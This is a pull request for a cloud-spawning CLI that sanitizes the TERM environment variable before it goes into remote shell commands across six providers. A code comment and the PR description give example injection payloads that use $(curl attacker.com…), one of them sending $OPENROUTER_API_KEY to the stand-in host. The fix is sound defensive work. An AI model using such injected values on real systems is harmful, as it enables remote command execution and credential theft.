### PR TITLE
security: sanitize TERM env var to prevent shell injection

### DIFF
--- a/cli/package.json
+++ b/cli/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@openrouter/spawn",
-  "version": "0.6.16",
+  "version": "0.6.17",
   "type": "module",
   "bin": {
     "spawn": "cli.js"

--- a/cli/src/aws/aws.ts
+++ b/cli/src/aws/aws.ts
@@ -13,6 +13,7 @@ import {
   validateRegionName,
   toKebabCase,
   defaultSpawnName,
+  sanitizeTermValue,
 } from "../shared/ui";
 import type { CloudInitTier } from "../shared/agents";
 import { getPackagesForTier, needsNode, needsBun, NODE_INSTALL_CMD } from "../shared/cloud-init";
@@ -1056,7 +1057,7 @@ export async function uploadFile(localPath: string, remotePath: string): Promise
 }
 
 export async function interactiveSession(cmd: string): Promise<number> {
-  const term = process.env.TERM || "xterm-256color";
+  const term = sanitizeTermValue(process.env.TERM || "xterm-256color");
   const fullCmd = `export TERM=${term} PATH="$HOME/.npm-global/bin:$HOME/.claude/local/bin:$HOME/.local/bin:$HOME/.bun/bin:$PATH" && exec bash -l -c ${JSON.stringify(cmd)}`;
   const escapedCmd = fullCmd.replace(/'/g, "'\\''");
   const proc = Bun.spawn(

--- a/cli/src/daytona/daytona.ts
+++ b/cli/src/daytona/daytona.ts
@@ -11,6 +11,7 @@ import {
   validateServerName,
   toKebabCase,
   defaultSpawnName,
+  sanitizeTermValue,
 } from "../shared/ui";
 import type { CloudInitTier } from "../shared/agents";
 import { getPackagesForTier, needsNode, needsBun, NODE_INSTALL_CMD } from "../shared/cloud-init";
@@ -489,7 +490,7 @@ export async function uploadFile(localPath: string, remotePath: string): Promise
 }
 
 export async function interactiveSession(cmd: string): Promise<number> {
-  const term = process.env.TERM || "xterm-256color";
+  const term = sanitizeTermValue(process.env.TERM || "xterm-256color");
   const fullCmd = `export TERM=${term} PATH="$HOME/.local/bin:$HOME/.bun/bin:$PATH" && exec bash -l -c ${JSON.stringify(cmd)}`;
 
   // Interactive mode — drop BatchMode so the PTY works

--- a/cli/src/digitalocean/digitalocean.ts
+++ b/cli/src/digitalocean/digitalocean.ts
@@ -12,6 +12,7 @@ import {
   validateRegionName,
   toKebabCase,
   defaultSpawnName,
+  sanitizeTermValue,
 } from "../shared/ui";
 import type { CloudInitTier } from "../shared/agents";
 import { getPackagesForTier, needsNode, needsBun, NODE_INSTALL_CMD } from "../shared/cloud-init";
@@ -1059,7 +1060,7 @@ export async function uploadFile(localPath: string, remotePath: string, ip?: str
 
 export async function interactiveSession(cmd: string, ip?: string): Promise<number> {
   const serverIp = ip || doServerIp;
-  const term = process.env.TERM || "xterm-256color";
+  const term = sanitizeTermValue(process.env.TERM || "xterm-256color");
   const fullCmd = `export TERM=${term} PATH="$HOME/.local/bin:$HOME/.bun/bin:$PATH" && exec bash -l -c ${JSON.stringify(cmd)}`;
 
   const proc = Bun.spawn(

--- a/cli/src/fly/fly.ts
+++ b/cli/src/fly/fly.ts
@@ -13,6 +13,7 @@ import {
   validateRegionName,
   toKebabCase,
   defaultSpawnName,
+  sanitizeTermValue,
 } from "../shared/ui";
 import type { CloudInitTier } from "../shared/agents";
 import { getPackagesForTier, needsNode, needsBun, NODE_INSTALL_CMD } from "../shared/cloud-init";
@@ -1036,7 +1037,7 @@ export async function uploadFile(localPath: string, remotePath: string): Promise
 }
 
 export async function interactiveSession(cmd: string): Promise<number> {
-  const term = process.env.TERM || "xterm-256color";
+  const term = sanitizeTermValue(process.env.TERM || "xterm-256color");
   const fullCmd = `export TERM=${term} PATH="$HOME/.local/bin:$HOME/.bun/bin:$PATH" && exec bash -l -c ${JSON.stringify(cmd)}`;
   // Shell-quote the command for -C
   const escapedCmd = fullCmd.replace(/'/g, "'\\''");

--- a/cli/src/gcp/gcp.ts
+++ b/cli/src/gcp/gcp.ts
@@ -12,6 +12,7 @@ import {
   validateServerName,
   toKebabCase,
   defaultSpawnName,
+  sanitizeTermValue,
 } from "../shared/ui";
 import type { CloudInitTier } from "../shared/agents";
 import { getPackagesForTier, needsNode, needsBun, NODE_INSTALL_CMD } from "../shared/cloud-init";
@@ -948,7 +949,7 @@ export async function uploadFile(localPath: string, remotePath: string): Promise
 
 export async function interactiveSession(cmd: string): Promise<number> {
   const username = resolveUsername();
-  const term = process.env.TERM || "xterm-256color";
+  const term = sanitizeTermValue(process.env.TERM || "xterm-256color");
   const fullCmd = `export TERM=${term} PATH="$HOME/.npm-global/bin:$HOME/.claude/local/bin:$HOME/.local/bin:$HOME/.bun/bin:$PATH" && exec bash -l -c ${JSON.stringify(cmd)}`;
 
   const proc = Bun.spawn(

--- a/cli/src/hetzner/hetzner.ts
+++ b/cli/src/hetzner/hetzner.ts
@@ -12,6 +12,7 @@ import {
   validateRegionName,
   toKebabCase,
   defaultSpawnName,
+  sanitizeTermValue,
 } from "../shared/ui";
 import type { CloudInitTier } from "../shared/agents";
 import { getPackagesForTier, needsNode, needsBun, NODE_INSTALL_CMD } from "../shared/cloud-init";
@@ -643,7 +644,7 @@ export async function uploadFile(localPath: string, remotePath: string, ip?: str
 
 export async function interactiveSession(cmd: string, ip?: string): Promise<number> {
   const serverIp = ip || hetznerServerIp;
-  const term = process.env.TERM || "xterm-256color";
+  const term = sanitizeTermValue(process.env.TERM || "xterm-256color");
   const fullCmd = `export TERM=${term} PATH="$HOME/.local/bin:$HOME/.bun/bin:$PATH" && exec bash -l -c ${JSON.stringify(cmd)}`;
 
   const proc = Bun.spawn(

--- a/cli/src/shared/ui.ts
+++ b/cli/src/shared/ui.ts
@@ -195,3 +195,13 @@ export function defaultSpawnName(): string {
   const suffix = Math.random().toString(36).slice(2, 6);
   return `spawn-${suffix}`;
 }
+
+/** Sanitize TERM value before interpolating into shell commands.
+ *  SECURITY: Prevents shell injection via malicious TERM env vars
+ *  (e.g., TERM='$(curl attacker.com)' would execute on the remote server). */
+export function sanitizeTermValue(term: string): string {
+  if (/^[a-zA-Z0-9._-]+$/.test(term)) {
+    return term;
+  }
+  return "xterm-256color";
+}


### PR DESCRIPTION
**Why:** All 6 cloud providers interpolate `process.env.TERM` directly into shell command strings without validation (`export TERM=${term} ...`). A malicious TERM value like `xterm$(curl attacker.com/steal?key=$OPENROUTER_API_KEY)` would execute on the remote server, exfiltrating API keys and credentials.

Adds `sanitizeTermValue()` to `cli/src/shared/ui.ts` with an allowlist regex (`^[a-zA-Z0-9._-]+$`) covering all standard terminal names (xterm-256color, screen.xterm-256color, linux, dumb, etc.). Falls back to `xterm-256color` if validation fails.

Applied to `interactiveSession()` in all 6 cloud providers:
- `cli/src/aws/aws.ts`
- `cli/src/digitalocean/digitalocean.ts`
- `cli/src/fly/fly.ts`
- `cli/src/gcp/gcp.ts`
- `cli/src/hetzner/hetzner.ts`
- `cli/src/daytona/daytona.ts`

All 1819 tests pass.

-- refactor/security-auditor